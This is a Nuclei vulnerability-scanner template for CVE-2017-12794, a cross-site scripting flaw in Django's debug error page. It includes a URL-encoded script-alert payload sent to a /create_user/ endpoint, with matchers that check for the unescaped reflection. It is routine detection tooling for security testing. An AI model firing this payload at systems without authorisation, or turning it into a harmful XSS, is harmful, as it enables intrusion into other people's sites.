nuclei-templates/cves/2017/CVE-2017-12794.yaml

43 lines
1.3 KiB
YAML

id: CVE-2017-12794
info:
name: Django Debug Page - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible).
reference:
- https://twitter.com/sec715/status/1406779605055270914
- https://nvd.nist.gov/vuln/detail/CVE-2017-12794
- https://www.djangoproject.com/weblog/2017/sep/05/security-releases/
- http://www.securitytracker.com/id/1039264
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-12794
cwe-id: CWE-79
tags: xss,django,cve,cve2017
requests:
- method: GET
path:
- "{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/04/26